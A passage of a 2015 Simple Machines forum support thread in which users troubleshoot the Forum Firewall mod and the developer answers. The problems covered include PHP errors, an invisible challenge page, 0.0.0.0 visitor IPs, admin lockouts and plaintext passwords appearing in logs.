                        echo ' <div class="ff_content_' . $ff_Ctr . ' ff_content_' . $ff_Ctr . '_hover" onclick="window.location.href=\'' . ((($ff_Ctr == $context['ff_Sho'][0]) || ($ff_Ctr == $context['ff_Sho'][1])) ? '':$context['honeyLink']) . '\'">';
                        if ($ff_Ctr == $context['ff_Sho'][0]) echo ' <input type="image" src="'.$context['ForumFirewall_Enter'].'" name="submit1" id="submit1" value="" />';
                        elseif ($ff_Ctr == $context['ff_Sho'][1]) echo ' <input type="image" src="'.$context['ForumFirewall_Cancel'].'" name="submit" id="submit" value="" />';


with:
echo ' <div class="ff_border' . ($myCtr/2-1) . '"><ul><li class="ff_content_b">';
                for ($ff_Ctr = 1; $ff_Ctr < $myCtr+1; $ff_Ctr++) {
                        echo ' <div class="ff_content_' . $ff_Ctr . ' ff_content_' . $ff_Ctr . '_hover" onclick="window.location.href=\'' . ((($ff_Ctr == $context['ff_Sho']) || ($ff_Ctr == $context['ff_Sho'][1])) ? '':$context['honeyLink']) . '\'">';
                        if ($ff_Ctr == $context['ff_Sho']) echo ' <input type="image" src="'.$context['ForumFirewall_Enter'].'" name="submit1" id="submit1" value="" />';
                        elseif ($ff_Ctr == $context['ff_Sho']) echo ' <input type="image" src="'.$context['ForumFirewall_Cancel'].'" name="submit" id="submit" value="" />';


Let me know if it works?

If htaccess does not work your host should be able to make adjustments to eliminate the "SECURITY RISK".  This has been covered before...
Title: Re: Forum Firewall
Post by: awolexpat on January 11, 2015, 09:24:57 AM
Hi butchs,

I have made that change and it has apparently stopped the error on line 137 but at this early stage it seems like the line 135 error is still occurring. I will know more tomorrow when the site has been hit a few more times. As regards the challenges logs, they are empty and have been since I updated. The Visitors logs are too.

While I was doing this I have also been trying to fix the security risk message appearing, and in the process I wanted to look at my phpinfo file, but mistyped the filename and it threw a 404 error (of course); however this opened the Challenge page which I must admit I found quite confusing, as it asked for a reason why I wanted access to this page and had a text box that you had to fill in within 5 minutes - can you give me some more insight into this, or is it not working correctly on my site? What I have discovered though is that allow_url_include is off, while allow_url_fopen is on, despite me turning it off in the php.ini file - however further down the php info file it says on a separate line "disable_functions   show_source, allow_url_fopen" which to me says that it has been turned off, but I am still getting the error message. I know very little about php so I am at the mercy of those who do to try and explain what I need to do now. I haven't yet contacted my host as if I can do this myself i'd prefer it, as I also want to understand what is going on.
Title: Re: Forum Firewall
Post by: butchs on January 11, 2015, 10:10:10 AM
Line 137 was edited too so the 1 error should be gone.  Try refreshing your cache.

To view logs you will need to enable logging.

The Challenge page is quite simple mostly php anti-bot tool.  It is meant to be the converse to Cloud Flares JS (like) page.  It asks you for a reason (any reason) and then click on enter forum.

To gain access all one can say "awolexpat is a nice person" and click on enter.
To be denied access try "Buy Viagra" and click enter.

Check out this link to disable allow_url_fopen (http://phpsec.org/projects/phpsecinfo/tests/allow_url_fopen.html).
Title: Re: Forum Firewall
Post by: awolexpat on January 11, 2015, 11:16:20 PM
Have had more errors on line 135 now I have checked again, although less than before - 25 in total in the last 12 hours . Logging was already enabled but I also noticed that both the Enable Testing and Block Violations boxes were ticked, so I have now unticked the latter, and suddenly there are logs in the Visitors but still none in Challenges. It doesn't say anything on the mod page instructions that I can see so is there a problem having both ticked?

The Challenge page I saw did not have an 'Enter forum' button; the page appeared when I was logged in on another tab of my browser but showed me as a guest which I thought was a bit odd but could just be that the session had expired. I entered text in the box, and the explanatory text said "Click within the appropriate text box one time when ready:
(an incorrect choice will deny access)" but nothing happened - you might want to reword that if there is meant to be a button to click; it turns out that the button was there but invisible on both my theme (Blackhead by Crip) and also when I tried the default theme except when you hover over them, and it is impossible to know which one you need to click as there does not appear to be any text in them on my site. Can I assume that this is not deliberate? On checking with Chrome's Inspect Element I see that there are six possible boxes and looking at the CSS (from ff_firewall.css) there are two parts which are said to be invalid by the inspector in .ff_content_0 through to 6, as follows:
border: solid .1em #white;
background: #white;

If you can suggest what I can do to correct this I would be grateful. Is it possible that having both Enable Testing and Block Violations ticked was causing some of this?

As a related issue, when I log out of the forum I am taken to the challenge page as well - is this correct behaviour? I would rather the members were taken to the home page when they log out.

Thank you for the link about allow_url_fopen - the instructions there differ very slightly from what I did, as they had the Off command enclosed in quotes; I changed this in the php.ini file but the error message is still there; I cleared my browser cache as well just in case. I think I will need to contact my host, or possibly relocate the php.ini file which is currently in the home/user directory.

Sorry if I am being a pain and I hope you can suffer this (php)fool...
Title: Re: Forum Firewall
Post by: tranhiep_116 on January 12, 2015, 05:36:07 AM
incredible mod  ;D
Title: Re: Forum Firewall
Post by: butchs on January 12, 2015, 05:56:30 PM
Quote from: awolexpat on January 11, 2015, 11:16:20 PM
Logging was already enabled but I also noticed that both the Enable Testing and Block Violations boxes were ticked, so I have now unticked the latter,

Not recommended... Both should be checked for the mod to work.

Not sure about your errors after the fix, could be bots probing for weaknesses.  Could be hitting issues with other parts of SMF or whatever...  I find it hard to believe you are getting the 1 error since we removed your code.  Sounds like cache to me...  Maybe I need more info...  Maybe email or pm me logs...

You need to enable cookies, java and lower your security for the challenge to work.  Otherwise how else can I tell you are human.  Some bots turn off cookies and java!  There are just so many behind the scenes tests going on behind the challenge to confirm you have good intent...

Quote from: awolexpat on January 11, 2015, 11:16:20 PMborder: solid .1em #white;
background: #white;

Oh gosh...  Maybe removing # before the color will work for you?  Delete it, do not add a space.

Quote from: awolexpat on January 11, 2015, 11:16:20 PM
As a related issue, when I log out of the forum I am taken to the challenge page as well - is this correct behavior? I would rather the members were taken to the home page when they log out.

Sounds right when SMF is not logging your IP as Admin.[/quote]

Quote from: awolexpat on January 11, 2015, 11:16:20 PM
I cleared my browser cache as well just in case

No no no...  SMF Forum cache (do a search).  If you use Cloudflare you have to reset that cache too.  Possibly your sites cache...  That is why the errors are not going away and the challenge images are not displaying...

I have limited time so if I did not answer everything at least I tried.
::)


Title: Re: Forum Firewall
Post by: awolexpat on January 12, 2015, 10:30:57 PM
butchs,

You are right, the errors have stopped now, so it must have been the cache, which I have cleared anyway now.

I already tried changing #white to #ffffff which I thought should have worked but nothing changed - however at that point I hadn't cleared the cache so I tried again after clearing the cache and it was still the same. I doubt it will make any difference but I will change that to just 'white', just in case.

I have just reactivated Block Violations so we will see what happens now. Visitor logs are still filling up and I don't know if this is significant but every single one of them (2540 in 24 hours - is that a lot?) has an IP address of 0.0.0.0 and I know at least some of them were me. Still nothing in Challenges logs. Incidentally, if wanted to clear the logs how would I do it?

One other query i have is that on a failed challenge the system takes me to the Honeypot link I have filled in on the Bad Behaviour mod - is that the correct behaviour?

One final issue has cropped up, that isn't a problem for me as such, but I think will be for you, is that all the credits for your mod and others I use, as well as the SMF one have gone from my footer, but I don't know when this happened - I don't think it has anything to do with your mod but i thought I ought to mention it in case it does. I have just looked with the default theme and they do appear there so I will have to look at my theme files; when I installed your mod there was an error relating to the footer credit which required me to manually edit but I am pretty certain I made the edit correctly, but clearly this is the first place for me to check. I just wanted to assure you that I am not deliberately trying to not credit you and others for your work!

Thank you for your help.
Title: Re: Forum Firewall
Post by: butchs on January 13, 2015, 05:23:44 PM
Quote from: awolexpat on January 12, 2015, 10:30:57 PM
I have just reactivated Block Violations so we will see what happens now. Visitor logs are still filling up and I don't know if this is significant but every single one of them (2540 in 24 hours - is that a lot?) has an IP address of 0.0.0.0 and I know at least some of them were me. Still nothing in Challenges logs. Incidentally, if wanted to clear the logs how would I do it?

0.0.0.0 is default for a blank IP, possibly a sloppy proxy.  What happens when you un-check "Review Proxy List"?

Another reason would be running cloudflare without the cloudflare mod for SMF.

Quote from: awolexpat on January 12, 2015, 10:30:57 PM
One other query i have is that on a failed challenge the system takes me to the Honeypot link I have filled in on the Bad Behaviour mod - is that the correct behaviour?

Yes.

Quote from: awolexpat on January 12, 2015, 10:30:57 PM
One final issue has cropped up, that isn't a problem for me as such, but I think will be for you, is that all the credits for your mod and others I use, as well as the SMF one have gone from my footer, but I don't know when this happened

Most likely another mod.
Title: Re: Forum Firewall
Post by: awolexpat on January 13, 2015, 09:34:31 PM
OK thanks for those answers; I have cleared up the footer issue, which while I don't know exactly why, it had something to do with me wanting to have the header remaining visible at all times on the Blackhead theme and have the rest of the page scroll beneath it, which I did with CSS; I have now had to fix the footer to the bottom of the screen and also make it bigger because I have so many mods that require a footer credit. Not your issue I know but just wanted to clear it up.

Review Proxy List was already unchecked. I will look into the Cloudflare issue - I was running it at one point but then I changed hosts, and while it is available with my new host I don't think I have set it up with them, but it may have been done automatically when my site was transferred. If it is on I will go to the mod you mention.

However I spoke too soon on the errors - the line 135 error has started again (about 80 in the last 24 hours) - any suggestions? And the challenge page is still not displaying correctly, in that the 'Enter Forum' and 'Cancel' text is not displaying and the box containing that text is invisible, while all the possible box choices become visible on hover. I made the changes in CSS discussed but no change in behaviour. This is the same with the default theme and my theme. I also tried highlighting the elements of that page to see if the text became visible but nothing is showing. I have attached a screenshot to illustrate with the default theme.
Title: Re: Forum Firewall
Post by: butchs on January 14, 2015, 05:36:14 PM
How could you possibly get errors for code that is not there?  Either the change did not take or there is a cache that you do not know about.  I have lost count for the number of people complaining that something did not work because of unknown site/ proxy settings.  I can not help you until you get my fix working.
Title: Re: Forum Firewall
Post by: Mastering on January 14, 2015, 08:07:27 PM
Hi butchs

A fanatic mod and thank you for creating it, getting it approved, and sharing it.

I am unable to find the answer via search and I am sure that this would have been answered before: 

I do not want to lock myself out before I switch on Block Violations but I am receiving: Invalid Admin IP: Repeated! and Hack: Repeated! in my visitors logs.  These are from my internet and phone connection and hence are trustworthy. 

I should not be concerned as these appear to be normal logs and I will be ok when I switch on Block Violations?


 
Title: Re: Forum Firewall
Post by: awolexpat on January 14, 2015, 09:36:37 PM
Quote from: butchs on January 14, 2015, 05:36:14 PM
How could you possibly get errors for code that is not there?  Either the change did not take or there is a cache that you do not know about.  I have lost count for the number of people complaining that something did not work because of unknown site/ proxy settings.  I can not help you until you get my fix working.

You're definitely asking the wrong person as regards how errors can appear for code that shouldn't be there! However I have now discovered something that could be the cause; when I changed hosts I (wrongly) assumed that everything would get transferred over, but I have now found out that Cloudflare was still being operated under my old host, so i have now remedied that. Following that I have cleared the cache at Cloudflare. I will report back once I see the result of doing that.
Title: Re: Forum Firewall
Post by: awolexpat on January 15, 2015, 12:49:23 AM
butchs,
Thanks for your attempts to help me but I have given up; the challenge page won't display correctly and the errors are still appearing after clearing the forum cache and the cloudflare one. I have spent too long trying to fix this and the issue with the challenge page is going to become irritating for my users who often want to browse the forum without logging in so I have uninstalled it. I will keep an eye on this topic though in case some kind of solution crops up but I am guessing there must be some sort of conflict with something else.
Title: Re: Forum Firewall
Post by: Mastering on January 15, 2015, 08:00:52 PM
Quote from: Mastering on January 14, 2015, 08:07:27 PMI am unable to find the answer via search and I am sure that this would have been answered before: 

I do not want to lock myself out before I switch on Block Violations but I am receiving: Invalid Admin IP: Repeated! and Hack: Repeated! in my visitors logs.  These are from my internet and phone connection and hence are trustworthy. 

I should not be concerned as these appear to be normal logs and I will be ok when I switch on Block Violations?


I found the answer - It locked me out  :(    I reset the phpadmin and change "forumfirewall_enable' to zero

Therefore how do I fix the  Invalid Admin IP: Repeated! and Hack: Repeated!?  The reason for the lock out was due to the my external IPs connection
Title: Re: Forum Firewall
Post by: dougiefresh on January 15, 2015, 08:34:21 PM
I need to file a bug report about this mod.

I have a forum at http://www.xptsp.com (http://www.xptsp.com), in which the webpages are run by the forum software by way of some coding I've done to convert posts to webpage material.  When I am logged out, I get this message:
QuoteWarning: file_put_contents(/ff_493c90325e88b2052b90b73489cf0d9994e241e8f34eeadc.php) [function.file-put-contents]: failed to open stream: Permission denied in /home/*******/public_html/site/board/Sources/Subs-ForumFirewall.php on line 1619
I traced this issue back to SSI.php, which my site uses to display the webpages.  It needs the following changes to SSI.php to get rid of this error message:
Code (Find) Select
require_once(dirname(__FILE__) . '/Settings.php');
Code (Add After) Select
// Make absolutely sure the ffcache directory is defined.
$ffcachedir = $boarddir . DIRECTORY_SEPARATOR . 'ffcache';


Hope this helps someone.....
Title: Re: Forum Firewall
Post by: Mastering on January 16, 2015, 06:23:52 PM
Quote from: Mastering on January 15, 2015, 08:00:52 PM
Quote from: Mastering on January 14, 2015, 08:07:27 PMI am unable to find the answer via search and I am sure that this would have been answered before: 

I do not want to lock myself out before I switch on Block Violations but I am receiving: Invalid Admin IP: Repeated! and Hack: Repeated! in my visitors logs.  These are from my internet and phone connection and hence are trustworthy. 

I should not be concerned as these appear to be normal logs and I will be ok when I switch on Block Violations?


I found the answer - It locked me out  :(    I reset the phpadmin and change "forumfirewall_enable' to zero

Therefore how do I fix the  Invalid Admin IP: Repeated! and Hack: Repeated!?  The reason for the lock out was due to the my external IPs connection

I have switched off all IP Address options in the forumfirewall but am still receiving Invalid ip: Repeated! in the visitors logs; and keep getting logged out of my forum

Any advice with my misconfiguration
Title: Re: Forum Firewall
Post by: butchs on January 17, 2015, 08:20:09 AM
Quote from: awolexpat on January 15, 2015, 12:49:23 AM
butchs,
Thanks for your attempts to help me but I have given up...

I do my best to help but I am not perfect.  Just turn off "Challenge Failed IP's" and wait until I upgrade the mod. Reinstalling a mod will reset the forum cache, then you reset CF and all changes will take hold.  Until then I need some time to transfer, learn and set-up my programming tools on a new computer...   Then I will play with Chrome and determine if there is a issue.  My list of household chores is starting to get short so I should be able to get back at it in a month.

Quote from: awolexpat on January 15, 2015, 12:49:23 AM
It needs the following changes to SSI.php to get rid of this error message:
Code (Find) Select
require_once(dirname(__FILE__) . '/Settings.php');
Code (Add After) Select
// Make absolutely sure the ffcache directory is defined.
$ffcachedir = $boarddir . DIRECTORY_SEPARATOR . 'ffcache';


Hope this helps someone.....

Your version may error log issues with the directory.  For a manual install you should make the following changes to SSI.php (which are included in
Code (find) Select
$cachedir;
Code (replace) Select
$cachedir, $ffcachedir;

Code (find) Select
loadTheme(isset($ssi_theme) ? (int) $ssi_theme : 0);
Code (add after) Select


// start ForumFirewall
require_once($sourcedir . DIRECTORY_SEPARATOR . 'ForumFirewall.php');
// end ForumFirewall


So my questions are:

Quote from: Mastering on January 16, 2015, 06:23:52 PM
Any advice with my misconfiguration

Instructions state that you test the mod and insure there are not forum members being blocked before enabling blocking.

Try to un-check "Block Violations".
Look at your visitors log and find out the hack text before repeated and remove it from your settings.
Do you have "Review Proxy List" checked?  Does un-checking remove the violation?
Un-check "Enable Admin IP Confirmation".
Test for a few days before you re-check "Block Violations".

Between changes uninstall the mod, reinstall the mod and reset cloudflare cache.

If the error continues please post the first error
Title: Re: Forum Firewall
Post by: Mastering on January 19, 2015, 05:38:20 PM
Quote from: butchs on January 17, 2015, 08:20:09 AM
Quote from: Mastering on January 16, 2015, 06:23:52 PM
Any advice with my misconfiguration

Instructions state that you test the mod and insure there are not forum members being blocked before enabling blocking.

Try to un-check "Block Violations".
Look at your visitors log and find out the hack text before repeated and remove it from your settings.
Do you have "Review Proxy List" checked?  Does un-checking remove the violation?
Un-check "Enable Admin IP Confirmation".
Test for a few days before you re-check "Block Violations".

Between changes uninstall the mod, reinstall the mod and reset cloudflare cache.

If the error continues please post the first error

The error is still continuing

I do not have anything ticked in 'IP address', also as I am using a hosting company - I have no proxy.

I have uninstalled several times.  The IP address is showing to be 0.0.0.0 in the logs from my desktop and mobile phone connection hence why I decided to uncheck everything from 'IP address'

Any suggestions for the above?

I have spotted a bug.  The error logs will show a mistype password.  Another Administrator could view this and be smart enough to work out my password
Title: Re: Forum Firewall
Post by: dougiefresh on January 19, 2015, 06:26:07 PM
I've gotten logged out of my own forum, too, after enabling the "Block Violators" checkbox.  Had to go into my phpMyAdmin and change the setting just so I could get back online....  My users were locked out of my forum for about 3 hours during this issue....

Anyways, I got into the Visitors logs and everybody has the 0.0.0.0 IP address and there are 10,000+ entries (no, i didn't look at every single one, but page after page of 0.0.0.0 gets annoying)....  There is something really wrong here....
Title: Re: Forum Firewall
Post by: Mastering on January 19, 2015, 06:43:31 PM
Quote from: dougiefresh on January 19, 2015, 06:26:07 PM
I've gotten logged out of my own forum, too, after enabling the "Block Violators" checkbox.  Had to go into my phpMyAdmin and change the setting just so I could get back online....  My users were locked out of my forum for about 3 hours during this issue....

Anyways, I got into the Visitors logs and everybody has the 0.0.0.0 IP address and there are 10,000+ entries (no, i didn't look at every single one, but page after page of 0.0.0.0 gets annoying)....  There is something really wrong here....

Are you using proxy?

If not then it could be a bug when not behind a proxy and using a hosting company

However the password in clear text not good! and I like the mod a lot because it is logging DOS attacks 
Title: Re: Forum Firewall
Post by: butchs on January 19, 2015, 06:46:00 PM
I have well over 50,324 visits with no 0.0.0.0 IPs using Cloudflare.    dougiefresh already admitted his host is using cloudflare.  He needs to fix the"Visitor IP call to Proxy" and " Proxy Header ID" settings.

I will say this once again:
DO NOT ENABLE BLOCKING UNTIL AFTER YOU HAVE THOROUGHLY TESTED THE MOD AND ARE 100% SURE YOU AND YOUR MEMBERS WILL NOT GET BLOCKED!

You need to look at the first issue, read the mods help, read the first page of this thread, adjust settings and remove phrases that can trigger an event.  Test first!
Title: Re: Forum Firewall
Post by: butchs on January 19, 2015, 06:58:07 PM
Quote from: Mastering on January 19, 2015, 06:43:31 PM
However the password in clear text not good! and I like the mod a lot because it is logging DOS attacks

No I am not going to try to locate a miss-typed password and scramble it.  If you mistype and have multiple admins then you should change your password.  Try saving it in a file and copy and past it.  One more thing, the mod will not log you for a miss-typed password.  Most likely there is a phrase in one of the tests that should be removed (maybe your password).  Look at the first reason.  The log is intuitive.


Title: Re: Forum Firewall
Post by: butchs on January 19, 2015, 07:10:39 PM
Here is an example reason:

      Bad Cookie: /CGI-BIN/VBOX_REDIRECT: Redirect!

Bad Cookie - This is where is found the issue.
Redirect - The phrase that caused the block that is located in the "XSS Events" list.

another one...

    Request Entity Attack: %2f!

Request Entity - The test.
%2f - the phrase in the "Request Entity Attacks" list.


Title: Re: Forum Firewall
Post by: Mastering on January 19, 2015, 07:24:56 PM
Quote from: butchs on January 19, 2015, 06:58:07 PM
Quote from: Mastering on January 19, 2015, 06:43:31 PM
However the password in clear text not good! and I like the mod a lot because it is logging DOS attacks

No I am not going to try to locate a miss-typed password and scramble it.  If you mistype and have multiple admins then you should change your password.  Try saving it in a file and copy and past it.  One more thing, the mod will not log you for a miss-typed password.  Most likely there is a phrase in one of the tests that should be removed (maybe your password).  Look at the first reason.  The log is intuitive.

Please until we get to the bottom of this there is no work around for displaying a password in clear text

This part of my log:

0.0.0.0
Yesterday at 23:58:23
POST0: [Username is displayed] [password is displayed] 1 2: on 3: /forum/index.php?action=login2 HTTP/1.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/6.2.2 Safari/537.85.11 http://www.myforumwebsite.com/forum/index.php?action=login2
Invalid ip: Repeated!

Title: Re: Forum Firewall
Post by: butchs on January 19, 2015, 07:40:16 PM
To do it I would have to describable the SMF password and check the text.  This could slow things down.  Best solution is to delete the log (Remove All) after logging in or keep your cookies.

You need to find the things before "Repeated!".  Since you are hanging out here try visiting the forum at the "Protected by: Forum Firewall © 2010-2014" link.  Tell me the date and time you visited.  If you do not get a 0.0.0.0 block at my site then it is on your end.
Title: Re: Forum Firewall
Post by: Mastering on January 19, 2015, 08:05:38 PM
Quote from: butchs on January 19, 2015, 07:40:16 PM
To do it I would have to describable the SMF password and check the text.  This could slow things down.  Best solution is to delete the log (Remove All) after logging in or keep your cookies.

That is standard practice to encrypt passwords at that point.  The slow down will not even be noticeable.  I'm sorry but I may uninstall your mod - but I like it a lot and you do provide a lot of support to users and I still think it is great.  However by human error I do not wish to know my admins passwords or them knowing mine. 

Quote from: butchs on January 19, 2015, 07:40:16 PMYou need to find the things before "Repeated!".  Since you are hanging out here try visiting the forum at the "Protected by: Forum Firewall © 2010-2014" link.  Tell me the date and time you visited.  If you do not get a 0.0.0.0 block at my site then it is on your end.


I did this about 5 minutes ago.  I entered Mastering as my username and my password was Password123 - I think this was my password. And obviously it didn't log me in.  Not all of the time I receive an IP address of 0.0.0.0 when I log in to my site

Edited:  visited your site between 5 and 10 minutes ago before posting this
Title: Re: Forum Firewall
Post by: butchs on January 19, 2015, 09:12:40 PM
Your ip is 81.99.239.xx.  Could be others but you refused to give me the exact time (I had 180 visits in that time range).  You did not show up as 0.0.0.0 at my site.  You probably would have gained access if I did not block the UK.  The problem is on your end!

As far as other Admins GO, it is not my concern but ask around, what you are doing is not recommended by some highly regarded SMF experts other than myself.  They say there should only be 1 admin.  More than 1 is a security issue.  All others should be moderators.  Especially, if you do not trust your admins!

This mod is not for newbees.  If you want to come here and slap me around because you do not understand something or have a setting incorrect, prefer to ignore the recommendations and/ or do not want to put in effort; then please stop wasting my time.  I can only point you in a direction.  It is up to you to go there.

Your main complaint will be a mute point if you actually resolved the issue on your end I already gave advice for several posts ago.
:(
Title: Re: Forum Firewall
Post by: Mastering on January 19, 2015, 09:50:14 PM
Even if you did allow UK how would I gained access - it is protect by a firewall

Please provide me with the recommendation from official SMF documentation not to have more than one administrator.  Having more than one administrator in any form of IT will be a risk but having more than one with people who are trustworthy is more of a benefit IMO.  I do not let anyone know any of my passwords and good security code should never have this bug, and your code is good. 

I am not a newbie when it comes to configurations.  I am not wasting your time - this topic is now 50 pages - if I ask a question which has already been asked before then this is because there is a lot to read through.  I do not understand what I need to edit to make your code work correctly - which and what text am I meant to be looking at?  As a developer you may understand your code but to others it may not be that simple even when your direction is clear to you; but they may still need a bit more of a push before they understand it. 

If this code is not for newbie why make it for a friendly GUI open source software?

As you aware I am from the UK and as it is pass my bedtime therefore I am now going to sleep.

Once again I think you have created a good mod and I am not testing you as I would like this to work for my site
Title: Re: Forum Firewall
Post by: dougiefresh on January 20, 2015, 04:06:25 AM
Quote from: butchs on January 19, 2015, 06:46:00 PM
I have well over 50,324 visits with no 0.0.0.0 IPs using Cloudflare.    dougiefresh already admitted his host is using cloudflare.  He needs to fix the"Visitor IP call to Proxy" and " Proxy Header ID" settings.
No, I didn't admit anything....  Matter of fact, I didn't realize that was what was happening.  Good to know.  Now how do I fix those settings?  I guess it's time to read the entire thread unless I find it....  (or someone posts the solution  :P )  And no, I don't understand HOW to fix those settings....  I know where they are, I know how to change them, but I don't know what to change them to....
Title: Re: Forum Firewall
Post by: margarett on January 20, 2015, 07:28:33 AM
http://www.simplemachines.org/community/index.php?topic=532453.0
;)
Title: Re: Forum Firewall
Post by: dougiefresh on January 20, 2015, 10:58:06 AM
 ;D Thanks, margarett!!!  You saved me a bunch of time looking for the answer!  8)
Title: Re: Forum Firewall
Post by: Mastering on January 20, 2015, 02:06:55 PM
Quote from: butchs on January 19, 2015, 07:10:39 PM
Here is an example reason:

      Bad Cookie: /CGI-BIN/VBOX_REDIRECT: Redirect!

Bad Cookie - This is where is found the issue.
Redirect - The phrase that caused the block that is located in the "XSS Events" list.

another one...

    Request Entity Attack: %2f!

Request Entity - The test.
%2f - the phrase in the "Request Entity Attacks" list.

Ok I have unchecked XSS Events and Request Entity and I am now not showing in any logs.

I however do not understand with how to edit the values in text so that I can enable the other features
Title: Re: Forum Firewall
Post by: Kindred on January 23, 2015, 09:46:31 AM
So, I was noticing a similar error to one of the previous folks (undefined variables or unknown actions with firewall activity even though the firewall had been uninstalled.)

This was on the 2.1 test installation --  and the firewall had been removed and reinstalled a number of times, sometimes by uninstall/reinstall, sometimes by a complete replacement of files.

At some point, there was some confusion apparently and the database entries, including the SCHEDULED TASKS for the firewall never got removed...  I believe this may have been the source of the errors....      So -- if you are seeing errors the continue, even after you uninstall -- confirm that the scheduled tasks relating to the firewall are deleted, or at least disabled.
Title: Re: Forum Firewall
Post by: butchs on January 25, 2015, 06:23:29 PM
Hummm...  I believe that was fixed in the last version.

Status:  I am getting close to start work again.  I have xampp working, a text editor, files transferred, now I just need to find a debugger I like.

Quote from: Mastering on January 20, 2015, 02:06:55 PM
I however do not understand with how to edit the values in text so that I can enable the other features

In the Admin Setting Page there are text boxes with phrases sounded by "|".  Each phrase except for the first and last phrase must be surrounded by "|".  For example, if you want to remove "phrase_to_delete":

Change:
look_for_this|bad word|phrase_to_delete|last_one

by removing "phrase_to_delete|" and you will get:
look_for_this|bad word|last_one

Be careful, a typo will cause a bunch of errors in the log.

I think it is in the mods built in help when you click on the (http://www.simplemachines.org/community/Themes/default/images/helptopics.gif) in your FF Admin page.
Title: Re: Forum Firewall
Post by: Mastering on February 13, 2015, 07:37:28 PM
Quote from: butchs on January 25, 2015, 06:23:29 PM


Quote from: Mastering on January 20, 2015, 02:06:55 PM
I however do not understand with how to edit the values in text so that I can enable the other features

In the Admin Setting Page there are text boxes with phrases sounded by "|".  Each phrase except for the first and last phrase must be surrounded by "|".  For example, if you want to remove "phrase_to_delete":

Change:
look_for_this|bad word|phrase_to_delete|last_one

by removing "phrase_to_delete|" and you will get:
look_for_this|bad word|last_one

Be careful, a typo will cause a bunch of errors in the log.

I think it is in the mods built in help when you click on the (http://www.simplemachines.org/community/Themes/default/images/helptopics.gif) in your FF Admin page.

Many thanks butchs

I believe I have your MOD now working correctly  :)
Title: Re: Forum Firewall
Post by: tranhiep116 on February 13, 2015, 10:53:21 PM
how i can install that
Title: Re: Forum Firewall
Post by: Burke ♞ Knight on February 13, 2015, 11:31:04 PM
hehehe127, a little more into what you are asking, would help.

How do I ask support questions the smart way? (http://wiki.simplemachines.org/smf/How_do_I_ask_support_questions_the_smart_way)
How can I get my problems solved faster? (http://wiki.simplemachines.org/smf/How_can_I_get_my_problems_solved_faster)
What types of support are available? (http://wiki.simplemachines.org/smf/What_types_of_support_are_available)


Title: Re: Forum Firewall
Post by: butchs on February 15, 2015, 08:06:15 PM
Quote from: Mastering on February 13, 2015, 07:37:28 PM

Many thanks butchs

I believe I have your MOD now working correctly  :)

Great news!
Title: Re: Forum Firewall
Post by: AZMazda3 on June 30, 2015, 07:12:02 PM
Can someone point me in the right direction. I have searched this topic, unless my answer was typed in another language, I am not finding the answer I need.

I want to set up a country block, but can not find the way to do this. I know it uses info such as CC_deny and CC_allow but what I am not sure is if I am supposed to type this into the "Country" box under identification or is there something else?

The help window is confusing as it states "Country Codes must be entered in the format of "XX|YY" where XX and YY is the Country Code."

So I am lost at that point, I was thinking it was just type CC_deny where CC is the country code, am I wrong here?
Title: Re: Forum Firewall
Post by: butchs on June 30, 2015, 08:30:44 PM
It will not work unless your host has GeoIP or you are using a service like Couudflare.  The mod has built in help just click on the help icons!
Title: Re: Forum Firewall
Post by: AZMazda3 on July 01, 2015, 09:50:07 AM
Quote from: butchs on June 30, 2015, 08:30:44 PM
It will not work unless your host has GeoIP or you are using a service like Couudflare.  The mod has built in help just click on the help icons!

Ok, so good to know that this does not work without GeoIP.

In regards to the help icons, if you did not read my concern below. The help icons only give me part of the answer. I am not familiar with the XX|YY format, so I require more context please. I tried to find examples but everything I could find regarding country blocks is a different format. So using your mod, are we supposed to type in countries CN|UA|RN and so on or what?
Title: Re: Forum Firewall
Post by: AZMazda3 on July 01, 2015, 07:01:08 PM
Also, not even sure this mod is working, we had it installed on a much older version of SMF of which we just updgraded and reinstalled this mod. The only ip addresses showing up in the log are 0.0.0.0 and now we are getting about 1 registered member per day from countries we could care less about.
Title: Re: Forum Firewall
Post by: butchs on July 01, 2015, 07:43:00 PM
Something is not correct.  If you have cloudflare  then, you need to find and install the cloudflare mod.
Title: Re: Forum Firewall
Post by: AZMazda3 on July 03, 2015, 10:31:39 AM
Quote from: butchs on July 01, 2015, 07:43:00 PM
Something is not correct.  If you have cloudflare  then, you need to find and install the cloudflare mod.

Yes, something is wrong. The forum logs show ip, but the mod is not. So what is different?

We are not using CloudFlare, it is shared hosting on GoDaddy, a linux based server. So I'm not sure the cloudflare mod will help us.
Title: Re: Forum Firewall
Post by: Miker1029 on July 03, 2015, 03:50:24 PM
Got a question guys, No I didn't read through all 50 pages, Sry, Read the Last one, I'm considering installing this on my SMF 2.0.10, I installed on Localhost (With Errors) but seemed to be ok,  And Honestly have the stuff in this mod, I don't know about...  So SHOULD I Install it LIve?


Mike
Title: Re: Forum Firewall
Post by: margarett on July 03, 2015, 06:08:34 PM
You should not install with errors, ever. Better to always check what errors occur and make sure they can be manually fixed after installation
Title: Re: Forum Firewall
Post by: Miker1029 on July 05, 2015, 09:47:13 AM
Ya, I know, It was on my LocalHost, So a Simple Cut/Paste and PhpmyAdmin Drop/Import fixes it, I don't do ANYTHING Live, Especially Install on an Error....

The LIVE Question, I MEANT, If I was Able to get it in without the errors (I.E. Manually Installed ON LOCALHOST),  My Question Meant, Is it worth Installing it...

Sorry, I'm confusing Sometimes 8-)


Mike
Title: Re: Forum Firewall
Post by: butchs on July 06, 2015, 05:30:20 PM
Quote from: Miker1029 on July 03, 2015, 03:50:24 PM
Got a question guys, No I didn't read through all 50 pages, Sry, Read the Last one, I'm considering installing this on my SMF 2.0.10, I installed on Localhost (With Errors) but seemed to be ok,  And Honestly have the stuff in this mod, I don't know about...  So SHOULD I Install it LIve?


Mike

Just read the first post.  :)
Title: Re: Forum Firewall
Post by: AZMazda3 on July 08, 2015, 11:41:51 AM
Quote from: AZMazda3 on July 03, 2015, 10:31:39 AM
Quote from: butchs on July 01, 2015, 07:43:00 PM
Something is not correct.  If you have cloudflare  then, you need to find and install the cloudflare mod.

Yes, something is wrong. The forum logs show ip, but the mod is not. So what is different?

We are not using CloudFlare, it is shared hosting on GoDaddy, a linux based server. So I'm not sure the cloudflare mod will help us.

I'm still attempting to resolve this, I strongly feel that this issue of all visitor IPs being logged as 0.0.0.0 has something to do with the upgrade. I wish I had taken screenshots of the Forum Firewall visitor log beforehand but had no idea that this would happen.

Any thoughts here? I see some random posts in the SMF community about visitor IPs being 0.0.0.0
Title: Re: Forum Firewall
Post by: margarett on July 09, 2015, 05:05:24 PM
